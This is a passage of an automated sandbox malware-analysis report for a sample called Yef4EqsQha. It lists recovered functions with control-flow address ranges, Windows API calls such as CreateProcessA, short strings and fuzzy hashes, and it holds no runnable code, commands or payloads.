                                                                                                              control_flow_graph 1620 8c51240-8c51271 1621 8c51273 1620->1621 1622 8c51278-8c5133d 1620->1622 1621->1622 1628 8c5138b-8c5139c 1622->1628 1629 8c5133f-8c51377 1628->1629 1630 8c5139e-8c51406 1628->1630 1633 8c5137e-8c51388 1629->1633 1634 8c51379 1629->1634 1638 8c51c60-8c51c8b 1630->1638 1633->1628 1634->1633 1640 8c51c8d-8c51cb6 1638->1640 1641 8c51cb8-8c51cba 1638->1641 1642 8c51cc0-8c51cd4 1640->1642 1641->1642 1644 8c5140b-8c51412 1642->1644 1645 8c51cda-8c51ce1 1642->1645 1646 8c51464-8c5149f 1644->1646 1648 8c514a5-8c514ae 1646->1648 1649 8c51414-8c5142a 1646->1649 1652 8c514b1-8c514e5 1648->1652 1650 8c51431-8c5144f 1649->1650 1651 8c5142c 1649->1651 1653 8c51456-8c51461 1650->1653 1654 8c51451 1650->1654 1651->1650 1656 8c51504-8c5152b 1652->1656 1657 8c514e7-8c51501 1652->1657 1653->1646 1654->1653 1660 8c5152d-8c51556 1656->1660 1661 8c51558 1656->1661 1657->1656 1662 8c51562-8c51570 1660->1662 1661->1662 1664 8c51576-8c5157d 1662->1664 1665 8c51660-8c5170d 1662->1665 1666 8c51643-8c51654 1664->1666 1689 8c51713-8c51715 1665->1689 1690 8c5170f 1665->1690 1667 8c51582-8c51598 1666->1667 1668 8c5165a-8c5165b 1666->1668 1670 8c5159f-8c515fd 1667->1670 1671 8c5159a 1667->1671 1672 8c51c07-8c51c42 1668->1672 1682 8c51604-8c51629 1670->1682 1683 8c515ff 1670->1683 1671->1670 1672->1652 1677 8c51c48-8c51c5f 1672->1677 1677->1638 1687 8c5163f-8c51640 1682->1687 1688 8c5162b-8c51637 1682->1688 1683->1682 1687->1666 1688->1687 1693 8c5171c-8c51723 1689->1693 1691 8c51717 1690->1691 1692 8c51711 1690->1692 1691->1693 1692->1689 1694 8c51725-8c5172e 1693->1694 1695 8c51731-8c51762 1693->1695 1694->1695 1697 8c517b5-8c517f0 1695->1697 1699 8c51764-8c51779 1697->1699 1700 8c517f6-8c51809 1697->1700 1701 8c51780-8c5179e 1699->1701 1702 8c5177b 1699->1702 1706 8c51811-8c51831 1700->1706 1707 8c5180b-8c519b2 1700->1707 1704 8c517a5-8c517b2 1701->1704 1705 8c517a0 1701->1705 1702->1701 1704->1697 1705->1704 1713 8c5183a-8c518fd 1706->1713 1710 8c519b4-8c519b5 1707->1710 1711 8c519ba-8c51a59 1707->1711 1712 8c51bc2-8c51bef 1710->1712 1729 8c51a60-8c51a92 1711->1729 1730 8c51a5b 1711->1730 1716 8c51c06 1712->1716 1717 8c51bf1-8c51c05 1712->1717 1731 8c51904-8c51917 1713->1731 1732 8c518ff 1713->1732 1716->1672 1717->1716 1738 8c51a94 1729->1738 1739 8c51a99-8c51acb 1729->1739 1730->1729 1733 8c5191e-8c5192b 1731->1733 1734 8c51919 1731->1734 1732->1731 1735 8c51932-8c51956 1733->1735 1736 8c5192d 1733->1736 1734->1733 1742 8c5195d-8c51977 1735->1742 1743 8c51958 1735->1743 1736->1735 1738->1739 1744 8c51ad2-8c51b2f 1739->1744 1745 8c51acd 1739->1745 1746 8c519a2-8c519a3 1742->1746 1747 8c51979-8c51998 1742->1747 1743->1742 1752 8c51b81-8c51ba3 1744->1752 1753 8c51b31-8c51b7b 1744->1753 1745->1744 1746->1712 1748 8c5199f 1747->1748 1749 8c5199a 1747->1749 1748->1746 1749->1748 1757 8c51bad-8c51bc0 1752->1757 1753->1752 1757->1712
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1396328735.0000000008C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C50000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_8c50000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              • Opcode ID: e2b6417fed6c6a5890aedc58dfe0a60c929cdf79d2822c1c3b90af97e0a0f5e2
                                                                                                              • Instruction ID: 57994305bf5f4d01c8d1e20b5c356d89a5f68fc888ed5a608871f84be8fbf2fb
                                                                                                              • Opcode Fuzzy Hash: e2b6417fed6c6a5890aedc58dfe0a60c929cdf79d2822c1c3b90af97e0a0f5e2
                                                                                                              • Instruction Fuzzy Hash: 7162D174E01228CFDB24DF69C988BDDBBB2BB49301F1481EAD809A7255DB319E85CF54
                                                                                                              Function 077F9220 Relevance: .7, Instructions: 729COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89c18fad8872a632c5f50a8370c33d4e249bcc132312d5c43ec168679e0eb20b
                                                                                                              • Instruction ID: 27bcf244e0fb8922cafa2acfd0e3851847861131df1349341e2a4f4887622d5e
                                                                                                              • Opcode Fuzzy Hash: 89c18fad8872a632c5f50a8370c33d4e249bcc132312d5c43ec168679e0eb20b
                                                                                                              • Instruction Fuzzy Hash: EA42EFB1B012159FEB29EF78D590BAEB7F6AF89244F144469D245CF390CB30E805CBA1
                                                                                                              Function 01123E34 Relevance: .2, Instructions: 196COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 07a2dd569c5915ae3b61d5e403ec12ecac317f8525ba111b1b253e646798f300
                                                                                                              • Instruction ID: 2198789ae2bf0db0079fa4ffefe4862457eb125c29fb9a37d1930977aa2c836f
                                                                                                              • Opcode Fuzzy Hash: 07a2dd569c5915ae3b61d5e403ec12ecac317f8525ba111b1b253e646798f300
                                                                                                              • Instruction Fuzzy Hash: 7A81B374E003199FDF18EFA5D994AEEBBB2BF88304F208129D415AB368DB355952CF50
                                                                                                              Function 01126F90 Relevance: .1, Instructions: 142COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 70c3b9c4139d26c3aeee212546aabc687a84e474475c3eb39e00aff01f44e73b
                                                                                                              • Instruction ID: 48846be38daca4329f7b76d712c0f9eb0bd120ed7991ed0dde34219efc043d56
                                                                                                              • Opcode Fuzzy Hash: 70c3b9c4139d26c3aeee212546aabc687a84e474475c3eb39e00aff01f44e73b
                                                                                                              • Instruction Fuzzy Hash: 0B51E670E002599FDF58DFA9D994ADEBBB2BF89304F20812AD415AB368DB345D02CF50
                                                                                                              Function 077F0007 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8a7d2100cf5a641b36ef1180a1b8463d204cfbad44b85ea59f70397860b7adcf
                                                                                                              • Instruction ID: e86d39d27da5ef6787801d5a13ea11dedfb663f0b12a5c876b675f72bfc28de5
                                                                                                              • Opcode Fuzzy Hash: 8a7d2100cf5a641b36ef1180a1b8463d204cfbad44b85ea59f70397860b7adcf
                                                                                                              • Instruction Fuzzy Hash: 6C313EB1D097488FD719CF66C9153DEBFB2AF89340F04C5AAC508AA366D7740945CF91
                                                                                                              Function 077F0040 Relevance: .1, Instructions: 56COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d39b3d7cfe665a8ec0a05887223a52c1680c63a4cef91ead58e76a9af5d4f8b5
                                                                                                              • Instruction ID: 2355ca47f36a6aefb74631714889da55878786078efd731be735fed550a511ee
                                                                                                              • Opcode Fuzzy Hash: d39b3d7cfe665a8ec0a05887223a52c1680c63a4cef91ead58e76a9af5d4f8b5
                                                                                                              • Instruction Fuzzy Hash: 3E21B3B1E016189BEB18CF9BC9453DEFAF7AFC9340F04C46AD50966364EBB40945CE90
                                                                                                              Function 077F7B83 Relevance: .0, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4938d3fb46f4823825319fa87f32b671fb3da47ff54b3a4f387b85ec0e549897
                                                                                                              • Instruction ID: 324326c859615e6a6e7830b52999025df658323efe8d059003addd49f89e9794
                                                                                                              • Opcode Fuzzy Hash: 4938d3fb46f4823825319fa87f32b671fb3da47ff54b3a4f387b85ec0e549897
                                                                                                              • Instruction Fuzzy Hash: A6E080F4E1E048DFC740AF94A5081F8B778E747251F4420B6C60DE7701D63445544715
                                                                                                              Function 077F7D2C Relevance: .0, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 93ac716e626a8abfc1b0b5a8b6540d9553a767011acf6c4539a1e2b2115c4045
                                                                                                              • Instruction ID: fbdad7e465669ef0c255e9f593ace5000da3cc86747f488cf6d3d678cb01904f
                                                                                                              • Opcode Fuzzy Hash: 93ac716e626a8abfc1b0b5a8b6540d9553a767011acf6c4539a1e2b2115c4045
                                                                                                              • Instruction Fuzzy Hash: 2FC08C91E9F058EEC9003FC86A000F9E73C868B0A1F0030A2D30DA330381188A28016F
                                                                                                              Function 0112D570 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1296 112d570-112d60f GetCurrentProcess 1300 112d611-112d617 1296->1300 1301 112d618-112d64c GetCurrentThread 1296->1301 1300->1301 1302 112d655-112d689 GetCurrentProcess 1301->1302 1303 112d64e-112d654 1301->1303 1304 112d692-112d6ad call 112d75a 1302->1304 1305 112d68b-112d691 1302->1305 1303->1302 1309 112d6b3-112d6e2 GetCurrentThreadId 1304->1309 1305->1304 1310 112d6e4-112d6ea 1309->1310 1311 112d6eb-112d74d 1309->1311 1310->1311
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0112D5FE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 0112D63B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0112D678
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0112D6D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: ff30ccf65c5d330dcbe7409e9bb9967df8255566533e001b6eccc9fc55ffc6ff
                                                                                                              • Instruction ID: 455279b521368025f12f57b948a7a942e9d6f551bc77e102fe9f6f069bfd9a7f
                                                                                                              • Opcode Fuzzy Hash: ff30ccf65c5d330dcbe7409e9bb9967df8255566533e001b6eccc9fc55ffc6ff
                                                                                                              • Instruction Fuzzy Hash: 8F5156B09003598FDB28CFAAE5887EEBBF1FF48314F20805AE419A7350D7746944CB65
                                                                                                              Function 0112D580 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1318 112d580-112d60f GetCurrentProcess 1322 112d611-112d617 1318->1322 1323 112d618-112d64c GetCurrentThread 1318->1323 1322->1323 1324 112d655-112d689 GetCurrentProcess 1323->1324 1325 112d64e-112d654 1323->1325 1326 112d692-112d6ad call 112d75a 1324->1326 1327 112d68b-112d691 1324->1327 1325->1324 1331 112d6b3-112d6e2 GetCurrentThreadId 1326->1331 1327->1326 1332 112d6e4-112d6ea 1331->1332 1333 112d6eb-112d74d 1331->1333 1332->1333
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0112D5FE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 0112D63B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 0112D678
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0112D6D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1388069053.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_1120000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 855a94bd7a46db182381b3fdbadf106cde8d8183f92c0b163f4dca15f2976e87
                                                                                                              • Instruction ID: a6c79a53390fedbc7445364cecbf67066ca798fce65aee2ea51bbf2890dbda60
                                                                                                              • Opcode Fuzzy Hash: 855a94bd7a46db182381b3fdbadf106cde8d8183f92c0b163f4dca15f2976e87
                                                                                                              • Instruction Fuzzy Hash: 1A5125B09003598FDB28DFAAE588BEEBBF1FF48314F208459E419A7350D7746944CB65
                                                                                                              Function 074B9250 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1389 74b9250-74b9256 1390 74b9258-74b925d 1389->1390 1390->1390 1391 74b925f-74b9276 1390->1391 1392 74b9333-74b9342 1391->1392 1394 74b934d-74b93ae 1392->1394 1409 74b932a 1394->1409 1411 74b9280 1409->1411 1412 74b9287-74b9331 1409->1412 1411->1392 1411->1412 1413 74b92b7-74b92d5 1411->1413 1414 74b9315-74b9329 1411->1414 1412->1409 1419 74b92dc-74b92e9 1413->1419 1420 74b92d7-74b92da 1413->1420 1421 74b92eb-74b92fa 1419->1421 1420->1421 1424 74b92fc-74b9302 1421->1424 1425 74b9312 1421->1425 1426 74b9306-74b9308 1424->1426 1427 74b9304 1424->1427 1425->1414 1426->1425 1427->1425
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8q$8q$8q
                                                                                                              • API String ID: 0-3169173723
                                                                                                              • Opcode ID: b8eb0b0b4b9c298c09aa6f77e86d3a061faf6680dcc3b64ebf97fa5f82f1986f
                                                                                                              • Instruction ID: c3dce3da3690cbafe8629e8b00ed630ea791d54f75d2ee48b0b6fd1b1080d80e
                                                                                                              • Opcode Fuzzy Hash: b8eb0b0b4b9c298c09aa6f77e86d3a061faf6680dcc3b64ebf97fa5f82f1986f
                                                                                                              • Instruction Fuzzy Hash: 9E31F6F4E28306DFDB289BA494856FE7771EB8A200F514C17C702A7385D635AC0787B2
                                                                                                              Function 074B839F Relevance: 3.8, Strings: 3, Instructions: 39COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1450 74b839f-74b83d7 1452 74b83e0-74b83e2 1450->1452 1453 74b83fa-74b8417 1452->1453 1454 74b83e4-74b83ea 1452->1454 1458 74b841d-74b8513 1453->1458 1459 74b8582-74b8587 1453->1459 1455 74b83ee-74b83f0 1454->1455 1456 74b83ec 1454->1456 1455->1453 1456->1453
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$$q$$q
                                                                                                              • API String ID: 0-3275118826
                                                                                                              • Opcode ID: 50cd17ed9d8485d1a5d1b59e10bb3a63834f59eaa79b8ee8c62844599407c740
                                                                                                              • Instruction ID: c5a76e9779497e206d870a1a8445a051f437326518cceefd8357d1f92eeefb56
                                                                                                              • Opcode Fuzzy Hash: 50cd17ed9d8485d1a5d1b59e10bb3a63834f59eaa79b8ee8c62844599407c740
                                                                                                              • Instruction Fuzzy Hash: 2001D6B074020ADBE7344724DC667EA3669AB50704F298C539C069F681EAB19C51C7E1
                                                                                                              Function 074B2AD8 Relevance: 2.7, Strings: 2, Instructions: 222COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1462 74b2ad8-74b2ae7 1463 74b2aef-74b2af1 1462->1463 1464 74b2b0b-74b2b78 call 74b20d8 1463->1464 1465 74b2af3-74b2b08 1463->1465 1474 74b2b7e-74b2b80 1464->1474 1475 74b2c24-74b2c3b 1464->1475 1476 74b2cb0-74b2d57 1474->1476 1477 74b2b86-74b2b91 call 74b22f0 1474->1477 1485 74b2c3d-74b2c3f 1475->1485 1486 74b2c41 1475->1486 1518 74b2d59-74b2d5f 1476->1518 1519 74b2d60-74b2d81 1476->1519 1483 74b2bae-74b2bb2 1477->1483 1484 74b2b93-74b2b95 1477->1484 1489 74b2c11-74b2c1a 1483->1489 1490 74b2bb4-74b2bc8 call 74b2418 1483->1490 1487 74b2ba0-74b2bab call 74b16cc 1484->1487 1488 74b2b97-74b2b9e 1484->1488 1492 74b2c46-74b2c48 1485->1492 1486->1492 1487->1483 1488->1483 1500 74b2bca-74b2bdb call 74b16cc 1490->1500 1501 74b2bde-74b2be2 1490->1501 1497 74b2c4a-74b2c76 1492->1497 1498 74b2c7d-74b2ca9 1492->1498 1497->1498 1498->1476 1500->1501 1505 74b2bea-74b2c03 1501->1505 1506 74b2be4 1501->1506 1512 74b2c0e 1505->1512 1513 74b2c05 1505->1513 1506->1505 1512->1489 1513->1512 1518->1519
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$Hq
                                                                                                              • API String ID: 0-1154169777
                                                                                                              • Opcode ID: a9bd371c0df9306900e3209e639c4ed55fa7c707e5c1039dd90beb7458bd28ac
                                                                                                              • Instruction ID: a8f39c40d43f8b8e4623e2d53acd940ef91b3bb65aaf37a5cc50cad26f60f259
                                                                                                              • Opcode Fuzzy Hash: a9bd371c0df9306900e3209e639c4ed55fa7c707e5c1039dd90beb7458bd28ac
                                                                                                              • Instruction Fuzzy Hash: 0D718BB1A042199FDB24EF65D9157EEBBF6BBC8310F14842AD405A7340DB789D02CBA5
                                                                                                              Function 074B778F Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1523 74b778f-74b77be 1526 74b77c0-74b77c5 1523->1526 1526->1526 1527 74b77c7-74b7856 1526->1527 1535 74b785e-74b7864 1527->1535 1562 74b7867 call 77f8878 1535->1562 1563 74b7867 call 74b7a46 1535->1563 1536 74b786d-74b78c3 call 74b74a0 1545 74b78c7-74b78d3 1536->1545 1546 74b78c5 1536->1546 1547 74b78d5-74b7a36 1545->1547 1546->1547 1562->1536 1563->1536
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %*&/)(#$^@!~-_$0,Aq
                                                                                                              • API String ID: 0-2017700313
                                                                                                              • Opcode ID: 9d7a250c7cbe4005cf1843b0855b5571dc591385f1f705e9a7a3f740a3665f18
                                                                                                              • Instruction ID: 90789980eb812d0f252a7eb7b5b43e2cd667451824143e5a5bb6f5c94243d174
                                                                                                              • Opcode Fuzzy Hash: 9d7a250c7cbe4005cf1843b0855b5571dc591385f1f705e9a7a3f740a3665f18
                                                                                                              • Instruction Fuzzy Hash: BC71D434B04244AFD701AB64D4557EDBBB2EF89300F1489AAD8859F397CB34AE46C792
                                                                                                              Function 074B77C8 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1564 74b77c8-74b7864 1599 74b7867 call 77f8878 1564->1599 1600 74b7867 call 74b7a46 1564->1600 1573 74b786d-74b78c3 call 74b74a0 1582 74b78c7-74b78d3 1573->1582 1583 74b78c5 1573->1583 1584 74b78d5-74b7a36 1582->1584 1583->1584 1599->1573 1600->1573
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %*&/)(#$^@!~-_$0,Aq
                                                                                                              • API String ID: 0-2017700313
                                                                                                              • Opcode ID: 7755bb4fca05825f57b6ae3faba280d3b71652c6e6a6f41b86182ab605536fd0
                                                                                                              • Instruction ID: 3f632527b051550393d1acd18f565171debbaf7a6fc05339bf841bc97b9624bd
                                                                                                              • Opcode Fuzzy Hash: 7755bb4fca05825f57b6ae3faba280d3b71652c6e6a6f41b86182ab605536fd0
                                                                                                              • Instruction Fuzzy Hash: 02619434B00215AFD701AB64D455BAEBBB2FF88300F1489A9D8855F386CF74AE46CB91
                                                                                                              Function 074B82D0 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1601 74b82d0-74b82dc 1602 74b82de-74b8335 call 74b839f 1601->1602 1603 74b8333 1601->1603 1605 74b833b-74b833d 1602->1605 1603->1602 1609 74b82fc-74b830b 1605->1609 1610 74b82e6-74b82ec 1605->1610 1613 74b833f-74b851f 1609->1613 1614 74b830d-74b831a 1609->1614 1611 74b82ee 1610->1611 1612 74b82f0-74b82f2 1610->1612 1611->1609 1612->1609 1614->1613 1615 74b831c-74b8332 1614->1615
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395331083.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74b0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: 04e1c6dae0ffda881a9209fd9ce17df1ccf1f4468a6fe3e458b06266c8117afc
                                                                                                              • Instruction ID: 01a39c8ff332ac06dd8ebe50f70dd5bfcb13ce290360d445d5e32ed624b20678
                                                                                                              • Opcode Fuzzy Hash: 04e1c6dae0ffda881a9209fd9ce17df1ccf1f4468a6fe3e458b06266c8117afc
                                                                                                              • Instruction Fuzzy Hash: 7511C1B0929246CFC338DB24D9442E6BBBDBB06244F044AABD009DB642D7758D46CBF6
                                                                                                              Function 077F5BC5 Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1759 77f5bc5-77f5bc6 1760 77f5bcf-77f5bd1 1759->1760 1761 77f5bc8-77f5bca 1759->1761 1763 77f5bd3-77f5c24 1760->1763 1762 77f5bcc 1761->1762 1761->1763 1765 77f5c2e-77f5c65 1762->1765 1766 77f5bce 1762->1766 1763->1765 1768 77f5c9e-77f5cbe 1765->1768 1769 77f5c67-77f5c71 1765->1769 1766->1760 1774 77f5cf7-77f5d26 1768->1774 1775 77f5cc0-77f5cca 1768->1775 1769->1768 1770 77f5c73-77f5c75 1769->1770 1772 77f5c98-77f5c9b 1770->1772 1773 77f5c77-77f5c81 1770->1773 1772->1768 1776 77f5c85-77f5c94 1773->1776 1777 77f5c83 1773->1777 1785 77f5d5f-77f5e19 CreateProcessA 1774->1785 1786 77f5d28-77f5d32 1774->1786 1775->1774 1778 77f5ccc-77f5cce 1775->1778 1776->1776 1779 77f5c96 1776->1779 1777->1776 1780 77f5cf1-77f5cf4 1778->1780 1781 77f5cd0-77f5cda 1778->1781 1779->1772 1780->1774 1783 77f5cde-77f5ced 1781->1783 1784 77f5cdc 1781->1784 1783->1783 1787 77f5cef 1783->1787 1784->1783 1797 77f5e1b-77f5e21 1785->1797 1798 77f5e22-77f5ea8 1785->1798 1786->1785 1788 77f5d34-77f5d36 1786->1788 1787->1780 1789 77f5d59-77f5d5c 1788->1789 1790 77f5d38-77f5d42 1788->1790 1789->1785 1792 77f5d46-77f5d55 1790->1792 1793 77f5d44 1790->1793 1792->1792 1794 77f5d57 1792->1794 1793->1792 1794->1789 1797->1798 1808 77f5eaa-77f5eae 1798->1808 1809 77f5eb8-77f5ebc 1798->1809 1808->1809 1810 77f5eb0 1808->1810 1811 77f5ebe-77f5ec2 1809->1811 1812 77f5ecc-77f5ed0 1809->1812 1810->1809 1811->1812 1813 77f5ec4 1811->1813 1814 77f5ed2-77f5ed6 1812->1814 1815 77f5ee0-77f5ee4 1812->1815 1813->1812 1814->1815 1818 77f5ed8 1814->1818 1816 77f5ef6-77f5efd 1815->1816 1817 77f5ee6-77f5eec 1815->1817 1819 77f5eff-77f5f0e 1816->1819 1820 77f5f14 1816->1820 1817->1816 1818->1815 1819->1820 1822 77f5f15 1820->1822 1822->1822
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077F5E06
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1395630299.00000000077F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77f0000_Yef4EqsQha.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 2d08859dc2d7505d8b99518c49f1abbef4a7883af84c05f5725cee4ca8dd01c6
                                                                                                              • Instruction ID: 63cc81c16e9f3dc28b845ddcbedfe6d60d1e16ab569aabacb159f6d04537ba81
                                                                                                              • Opcode Fuzzy Hash: 2d08859dc2d7505d8b99518c49f1abbef4a7883af84c05f5725cee4ca8dd01c6
